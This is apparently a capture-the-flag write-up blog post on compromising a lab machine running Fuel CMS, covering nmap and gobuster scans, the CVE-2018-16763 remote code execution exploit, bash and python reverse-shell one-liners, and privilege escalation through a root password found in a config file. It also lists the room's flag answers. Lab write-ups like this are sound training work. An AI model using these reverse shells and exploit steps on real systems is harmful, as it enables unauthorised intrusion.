Description: A new start-up has a few issues with their web server.

Free room , Difficulty: Easy


>:sudo nmap -sC -sV 'machine-ip'

This is the scan method I use most of the time. With -sC it loads some standard nmap scripts and with -sV it shows the version of every service located at the open ports. My results were:

Nmap scan result

Open port is 80 HTTP. The website itself contains a content management system (CMS) named fuel.


To further enumerate the machine I want to scan it for any, maybe some hidden, directories. For this I’m using GoBuster with the machine IP address and the wordlist with commonly used directory names:

>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt

GoBuster scan result

A lot of directories! Went through all of there and one useful result was “/fuel” as we saw in the nikto scan result above and it turns out to be a login page.

Login page of fuelCMS

Because CMS tend to have a lot of weak points so let’s have a look, if there is an exploit for Fuel CMS on “exploit-db”.

Search result on exploit-db

One result with the number CVE-2018-16763 we’re able to use a Remote Code Execution against the CMS. I downloaded it and entered my own IP address. Then I marked it as executable and executed it. My output contained errors and mostly because of the proxy. To make the exploit work I had to comment out the proxy entries otherwise to get rid of the errors. Now the exploit script should look like this

Entering the command whoami then got me the output www-data.

Command execution

Down are still some errors but we got our desired output on the top.

Privilege Escalation

Because I am now able to execute commands I entered the code for a reverse shell. But to catch any output we have to set up a netcat listener:

>:nc -lnvp 443

Now we can enter our reverse shell code(bash or python choose what ya like) .

>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

And then stabilized my current shell with:

>:python -c 'import pty; pty.spawn("/bin/bash")'

Note: I found out, that using the su command later on needs a terminal. So stabilizing the shell is very important to get to the solution.

Then I cat the “user.txt” file (*1). Searched for backups because those tend to contain valuable informations:

>:find / -type f -name "*.bak" 2>/dev/null

With the 2>/dev/null at the end I get rid of all the files I don’t have the permissions for it.

After looking around , I found the password for root: /var/www/html/fuel/application/config/database.php.


root: mememe

Okay so we just found the password for the root user and now we can change our account user to root using su command.


After this you can just get the root flag from /root.


1. User.txt
– 6470e394cbf6dab6a91682cc8585059b

2. Root.txt
– b9bbcb33e11b80be759c4e844862482d

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *